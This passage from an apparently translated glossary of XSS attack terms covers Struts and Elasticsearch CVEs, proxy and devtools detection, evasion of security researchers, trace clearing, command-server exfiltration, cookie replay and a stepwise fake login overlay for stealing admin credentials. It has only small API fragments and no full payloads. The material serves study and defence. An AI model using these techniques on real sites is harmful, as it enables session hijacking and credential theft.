| Term | Explanation |
|---|---|
| HPP | HTTP Parameter Pollution. Sending multiple ?name=value1&name=value2. |
12.16 Inject XSS code to all some origin frame
Important to know: Injecting XSS into all frames of a given origin. If a page has multiple iframes from the same origin, XSS in one can spread to others via window.frames or postMessage.
| Term | Explanation |
|---|---|
| Inject XSS code to all some origin frame | Spread XSS across multiple frames of same origin. |
12.17 Local transfer HTTP proxy
Important to know: Using a local HTTP proxy (Burp, Charles, Fiddler) to modify responses in transit, injecting XSS into pages on the fly. This is a testing technique, not an attack vector.
| Term | Explanation |
|---|---|
| Local transfer HTTP proxy | Modify HTTP traffic with local proxy (Burp, Fiddler) to inject XSS for testing. |
12.18 Jar virus
Important to know: Java Archive (JAR) files can contain malicious Java applets. Older browsers allowed Java applets to run with significant privileges. A "jar virus" infects via JAR files.
| Term | Explanation |
|---|---|
| Jar virus | Malicious Java applet in JAR file. Executes with potentially high privileges. |
PART 13: CVE VULNERABILITIES AND PATCH BYPASSES
13.1 CVE-2013-2251
Important to know: CVE-2013-2251 – Apache Struts 2 (before 2.3.15.1) remote code execution via OGNL injection. Not directly XSS, but can be chained with XSS for exploitation.
| Term | Explanation |
|---|---|
| CVE-2013-2251 | Apache Struts 2 RCE via OGNL injection. |
13.2 CVE-2014-0094
Important to know: CVE-2014-0094 – Apache Struts 2 (before 2.3.16.3) OGNL injection leading to remote code execution.
| Term | Explanation |
|---|---|
| CVE-2014-0094 | Apache Struts 2 OGNL injection RCE. |
13.3 CVE-2011-3923
Important to know: CVE-2011-3923 – Apache Struts 2 (before 2.3.14.2) parameter injection vulnerability.
| Term | Explanation |
|---|---|
| CVE-2011-3923 | Apache Struts 2 parameter injection. |
13.4 CVE-2013-1965
Important to know: CVE-2013-1965 – Apache Struts 2 (before 2.3.14.2) XWork parameter injection.
| Term | Explanation |
|---|---|
| CVE-2013-1965 | Apache Struts 2 XWork parameter injection. |
13.5 CVE-2013-1966
Important to know: CVE-2013-1966 – Apache Struts 2 (before 2.3.14.2) OGNL injection.
| Term | Explanation |
|---|---|
| CVE-2013-1966 | Apache Struts 2 OGNL injection. |
13.6 CVE-2014-3120
Important to know: CVE-2014-3120 – Elasticsearch (before 1.2) remote code execution via dynamic scripting.
| Term | Explanation |
|---|---|
| CVE-2014-3120 | Elasticsearch RCE via Groovy scripting. |
13.7 CVE-2015-1427
Important to know: CVE-2015-1427 – Elasticsearch (before 1.4.3) remote code execution via Groovy sandbox bypass.
| Term | Explanation |
|---|---|
| CVE-2015-1427 | Elasticsearch Groovy sandbox bypass RCE. |
13.8 Patch bypass
Important to know: Techniques to bypass security patches. When a vendor releases a patch for a vulnerability, attackers analyze the patch to find incomplete fixes or new bypass techniques.
| Term | Explanation |
|---|---|
| Patch bypass | Circumventing a security patch. The patch didn't fully fix the vulnerability. |
13.9 Struts 2: 80/8080
Important to know: Apache Struts 2 typically runs on port 80 (HTTP) or 8080 (development). Attackers target Struts 2 applications with OGNL injection payloads.
| Term | Explanation |
|---|---|
| Struts 2: 80/8080 | Default ports for Struts 2 web applications. Common target for OGNL injection. |
13.10 Ajax scan Intranet
Important to know: Using Ajax (XMLHttpRequest/fetch) from an XSS payload to scan internal network (intranet) for open ports and services. The victim's browser makes requests to internal IPs.
| Term | Explanation |
|---|---|
| Ajax scan Intranet | JavaScript sends fetch requests to internal IPs (192.168.x.x) to discover services. |
13.11 Elasticsearch: 9200
Important to know: Elasticsearch default port is 9200 (HTTP API). If an internal Elasticsearch instance is accessible from the browser, XSS can query it to steal data or execute scripts.
| Term | Explanation |
|---|---|
| Elasticsearch: 9200 | Default Elasticsearch port. XSS can access internal Elasticsearch APIs. |
13.12 Trusting-zone
Important to know: Trusted zones (e.g., Intranet Zone in IE) have lower security settings. XSS on a page in the Trusted Zone can have more privileges (e.g., accessing local files).
| Term | Explanation |
|---|---|
| Trusting-zone | Browser security zone with relaxed restrictions (Intranet Zone). |
13.13 Privileged-zone
Important to know: Privileged zones (e.g., Trusted Sites in IE) allow ActiveX, file access, and other high-privilege actions. XSS in privileged zones is extremely dangerous.
| Term | Explanation |
|---|---|
| Privileged-zone | High-privilege security zone. Allows ActiveX, local file access, etc. |
13.14 los (Likely "iOS")
Important to know: iOS (Apple mobile operating system) has its own WebKit-based browser. XSS vectors may differ from desktop Safari.
| Term | Explanation |
|---|---|
| los | iOS (typo). Mobile Safari XSS quirks. |
13.15 Andriod (Android)
Important to know: Android's built-in browser (WebView) has unique XSS characteristics. WebViews with setJavaScriptEnabled(true) and addJavascriptInterface are especially vulnerable.
| Term | Explanation |
|---|---|
| Andriod | Android (typo). Android WebView XSS and JavaScript bridge exploitation. |
13.16 PC
Important to know: Desktop browsers (Windows, macOS, Linux) have different XSS behaviors and security features.
| Term | Explanation |
|---|---|
| PC | Desktop operating systems. Desktop browser XSS vectors. |
13.17 Detect tab is active: document.hidden
Important to know: The document.hidden property (or Page Visibility API) detects if the tab is currently visible. Attackers use this to only execute payloads when the tab is active (stealth) or to detect when the user is not looking.
| Term | Explanation |
|---|---|
| Detect tab is active: document.hidden | Page Visibility API. document.hidden = true means tab is not visible. |
13.18 Local File bypass SOP
Important to know: Bypassing Same-Origin Policy to read local files (file:// protocol). In older browsers, pages from file:// could access any other file:// URL, breaking SOP.
| Term | Explanation |
|---|---|
| Local File bypass SOP | Access local files via file:// protocol across origins. |
PART 14: LOCAL PROXY DETECTION AND DEVTOOLS
14.1 BurpSuite:8080
Important to know: Burp Suite proxy default port is 8080. XSS can detect if the user is using Burp by attempting to connect to localhost:8080 and checking response.
| Term | Explanation |
|---|---|
| BurpSuite:8080 | Default Burp Suite proxy port. Detect by fetching http://127.0.0.1:8080. |
14.2 Charles:8080
Important to know: Charles Proxy also uses port 8080 by default. Attackers can detect Charles for fingerprinting.
| Term | Explanation |
|---|---|
| Charles:8080 | Charles proxy default port. |
14.3 Fiddler:8888
Important to know: Fiddler proxy uses port 8888 by default.
| Term | Explanation |
|---|---|
| Fiddler:8888 | Fiddler proxy default port. |
14.4 127.0.0.1:8080/history
Important to know: Accessing localhost:8080/history may reveal Burp Suite's history page if the proxy is running and configured to allow access from the browser.
| Term | Explanation |
|---|---|
| 127.0.0.1:8080/history | Burp Suite history page. Accessible if Burp is running. |
14.5 Detect Local proxy
Important to know: JavaScript can detect if a local proxy (Burp, Charles, Fiddler, ZAP) is running by attempting to fetch http://localhost:8080 (or other common proxy ports) and checking for specific response headers or content.
| Term | Explanation |
|---|---|
| Detect Local proxy | Fetch localhost:8080. If response contains "Burp", "Charles", etc., proxy is detected. |
14.6 Detect devtools
Important to know: Detecting if browser developer tools are open. Techniques: console.profile() timing, debugger statement, window size differences, console.log output, or toString() of console object.
| Term | Explanation |
|---|---|
| Detect devtools | Detect open DevTools using timing, debugger, or console API quirks. |
14.7 npm install devtools-detect
Important to know: devtools-detect is an npm package that detects when DevTools is open. Attackers could use this library or its techniques to evade debugging.
| Term | Explanation |
|---|---|
| npm install devtools-detect | NPM package for DevTools detection. Attackers can use same methods. |
14.8 response jQuery
Important to know: Checking if the page uses jQuery by testing for window.jQuery or $. Attackers leverage jQuery functions for DOM manipulation and XSS.
| Term | Explanation |
|---|---|
| response jQuery | Detect jQuery presence: typeof jQuery !== 'undefined'. |
14.9 Check referer
Important to know: Checking the document.referrer to see where the user came from. Attackers use referer checks to avoid executing payloads when the request comes from security scanners.
| Term | Explanation |
|---|---|
| Check referer | Read document.referrer. If referrer is a known scanner, don't execute. |
14.10 Anti-Tracking
Important to know: Techniques to prevent tracking: disabling cookies, using private browsing, blocking third-party requests. Attackers may also use anti-tracking to hide their activities.
| Term | Explanation |
|---|---|
| Anti-Tracking | Methods to avoid being tracked by analytics, logging, or security tools. |
14.11 XSS Proxy
Important to know: (See 11.8) Persistent backdoor via XSS. The XSS payload sends victim's browser actions to attacker's command server.
| Term | Explanation |
|---|---|
| XSS Proxy | Tool for remote control of victim's browser via XSS. |
14.12 Clear trace
Important to know: Removing evidence of XSS activity: clearing console, modifying history, deleting cookies, removing injected DOM elements.
| Term | Explanation |
|---|---|
| Clear trace | Remove evidence: console.clear(), history.replaceState(), delete cookies. |
14.13 IP add to blacklist
Important to know: Some XSS payloads check if the victim's IP is blacklisted (e.g., security researcher IPs) and refuse to execute. Attackers evade detection by not attacking known security IPs.
| Term | Explanation |
|---|---|
| IP add to blacklist | Check if victim IP is on blacklist. If yes, don't execute payload. |
14.14 EXP (Exploit)
Important to know: The actual exploit code that achieves malicious goals (stealing cookies, defacing, etc.). Not just proof-of-concept.
| Term | Explanation |
|---|---|
| EXP | Full exploit (not just PoC). Steals data, persists, attacks. |
14.15 Message
Important to know: Communication between XSS payload and attacker's command server (via postMessage, WebSocket, Ajax, image beacons).
| Term | Explanation |
|---|---|
| Message | Data exfiltration or command channel. |
14.16 server
Important to know: Attacker-controlled server that receives stolen data, sends commands, or hosts malicious payloads.
| Term | Explanation |
|---|---|
| server | Attacker's C2 (command and control) server. |
14.17 Data receive
Important to know: Receiving stolen data (cookies, tokens, keystrokes, screenshots) from the XSS payload on the attacker's server.
| Term | Explanation |
|---|---|
| Data receive | Server endpoint that collects exfiltrated data. |
14.18 Keep session
Important to know: Maintaining access to a victim's session after XSS. Techniques: refreshing session tokens, re-login capturing, or using persistent storage (Service Worker, localStorage).
| Term | Explanation |
|---|---|
| Keep session | Maintain access to victim's authenticated session over time. |
14.19 Clear console: console.clear
Important to know: console.clear() removes all console messages. Attackers use this to hide errors, warnings, and log messages that might alert the user or developer.
| Term | Explanation |
|---|---|
| Clear console: console.clear | Clears browser console. Hides evidence of XSS execution. |
14.20 Clear address bar: history.replaceState
Important to know: history.replaceState() changes the URL in the address bar without reloading the page. Attackers use this to hide the malicious payload from the URL.
| Term | Explanation |
|---|---|
| Clear address bar: history.replaceState | Replace current URL with benign-looking URL. Hides XSS payload. |
14.21 Use WebSocket replace Http
Important to know: WebSockets provide full-duplex communication that may bypass HTTP-only security controls (like CSP that blocks HTTP requests). XSS payloads use WebSockets for stealthy C2.
| Term | Explanation |
|---|---|
| Use WebSocket replace Http | WebSocket for command channel. Bypasses CSP that blocks HTTP requests. |
14.22 Use Flash
Important to know: Flash can be used for XSS (via ActionScript) and for persistence (SharedObjects). Flash is deprecated but still present in some environments.
| Term | Explanation |
|---|---|
| Use Flash | Flash-based XSS vectors and persistence. |
14.23 Ajax_ge' (likely "Ajax get")
Important to know: Making Ajax GET requests to exfiltrate data or interact with attacker servers. ge' may be a typo for get.
| Term | Explanation |
|---|---|
| Ajax_ge' | Ajax GET request for data exfiltration. |
PART 15: INFORMATION COLLECTION AND DATA EXFILTRATION
15.1 execute JS
Important to know: The primary goal of XSS – execute arbitrary JavaScript in the victim's browser.
| Term | Explanation |
|---|---|
| execute JS | Run arbitrary JavaScript in victim's browser context. |
15.2 current page data
Important to know: Stealing data from the current page: DOM content, form values, session tokens, CSRF tokens, user inputs, displayed sensitive information.
| Term | Explanation |
|---|---|
| current page data | Extract document.cookie, localStorage, page HTML, form values. |
15.3 VPN
Important to know: Detecting if the victim is using a VPN by checking IP address or WebRTC leaks. Attackers may target non-VPN users or VPN users specifically.
| Term | Explanation |
|---|---|
| VPN | Detect VPN usage via IP geolocation or WebRTC. |
15.4 WebRTC get Gateway info
Important to know: WebRTC (Web Real-Time Communication) can reveal local IP addresses and gateway information even if the user is behind a VPN. Attackers use this to determine real IP and network topology.
| Term | Explanation |
|---|---|
| WebRTC get Gateway info | WebRTC STUN requests leak local IP and gateway IP. Bypasses VPN. |
15.5 Intranet IP
Important to know: Discovering the victim's internal IP address (e.g., 192.168.1.x). Used for network mapping and targeting internal services.
| Term | Explanation |
|---|---|
| Intranet IP | Internal IP address (private range). Obtained via WebRTC or RTCPeerConnection. |
15.6 All link: document.links
Important to know: document.links returns a collection of all <a> and <area> elements with href attributes. Attackers scrape all links to find interesting targets or hidden admin pages.
| Term | Explanation |
|---|---|
| All link: document.links | Collect all hyperlinks on the page. Used for reconnaissance. |
15.7 Info collection
Important to know: Comprehensive information gathering from the victim's browser: user agent, screen resolution, installed plugins, language, timezone, visited URLs (via CSS :visited), browser extensions, etc.
| Term | Explanation |
|---|---|
| Info collection | Browser fingerprinting: userAgent, plugins, screen, language, timezone. |
15.8 Custom X-Forwarded-For bypass IP limit
Important to know: The X-Forwarded-For header can be spoofed by clients. If a server uses this header for rate limiting or access control, attackers can bypass IP restrictions by adding fake IPs.
| Term | Explanation |
|---|---|
| Custom X-Forwarded-For bypass IP limit | Spoof X-Forwarded-For: 127.0.0.1 to bypass IP-based restrictions. |
15.9 Replay cookies
Important to know: Capturing a victim's cookies and replaying them (using them in another browser) to hijack the session. This is the classic XSS cookie theft attack.
| Term | Explanation |
|---|---|
| Replay cookies | Use stolen cookies in attacker's browser to impersonate victim. |
15.10 Use Http Proxy replay, prevent cookie domain field wrong
Important to know: When replaying stolen cookies, the domain field of the cookie must match the target domain. Using an HTTP proxy (like Burp) allows attackers to modify requests and ensure cookies are sent with the correct domain.
| Term | Explanation |
|---|---|
| Use Http Proxy replay, prevent cookie domain field wrong | Proxy (Burp) to modify cookie domain when replaying stolen cookies. |
PART 16: ADVANCED PERSISTENCE AND STEALTH TECHNIQUES
16.1 1. hook all link click event
Important to know: Adding event listeners to every link on the page (document.querySelectorAll('a')). When the user clicks any link, the XSS payload intercepts the click, steals the destination, modifies it, or prevents navigation.
| Term | Explanation |
|---|---|
| 1. hook all link click event | Add click listener to all <a> tags. Intercept link navigation. |
16.2 2. each path filed remove cookie
Important to know: Removing cookies from the request before the browser sends them. This can be done by clearing document.cookie or using delete on specific cookies. Prevents the server from receiving authentication cookies.
| Term | Explanation |
|---|---|
| 2. each path filed remove cookie | Delete or modify cookies to degrade user session. |
16.3 3. multiple call history.pushState, prevent go back.
Important to know: Calling history.pushState() multiple times adds many entries to browser history. When the user clicks "Back", they must go through all these fake entries, preventing them from leaving the malicious page.
| Term | Explanation |
|---|---|
| 3. multiple call history.pushState, prevent go back | Fill history with fake entries. Traps user in malicious page. |
16.4 4. ajax get login page
Important to know: Using Ajax to fetch the login page (or any authenticated page) from the server. This retrieves HTML, JavaScript, and potentially CSRF tokens needed to craft a fake login form.
| Term | Explanation |
|---|---|
| 4. ajax get login page | Fetch login page HTML via Ajax. Extract CSRF tokens and form structure. |
16.5 Steal Admin login info
Important to know: Ultimate goal of many XSS attacks – capture administrator credentials. Attackers create fake login overlays, keyloggers, or session stealers targeting admin users.
| Term | Explanation |
|---|---|
| Steal Admin login info | Capture admin username/password via fake form or keylogger. |
16.6 5. clear DOM: document.open
Important to know: document.open() clears the current document and document.write() writes new content. Attackers replace the entire page with a fake login form or phishing page.
| Term | Explanation |
|---|---|
| 5. clear DOM: document.open | Open new document, write malicious content. Replaces original page. |
16.7 6. write login page
Important to know: After clearing the DOM, write a convincing fake login page that looks identical to the real site. Capture entered credentials.
| Term | Explanation |
|---|---|
| 6. write login page | Write HTML of fake login form. Steal user credentials. |
16.8 6. set documenttitle (Duplicate numbering in original)
Important to know: Change the page title (document.title = "Login") to make the fake page look legitimate.
| Term | Explanation |
|---|---|
| 6. set documenttitle | Set document.title to match legitimate site title. |
16.9 7. 500ms defer bind steal event to all form
Important to know: Wait 500 milliseconds, then bind event listeners to all forms (document.forms). When the user submits any form, the XSS payload steals the data (username, password) before the form submits to the legitimate server.
| Term | Explanation |
|---|---|
| 7. 500ms defer bind steal event to all form | Delay form hijacking to avoid detection. Intercept form submissions. |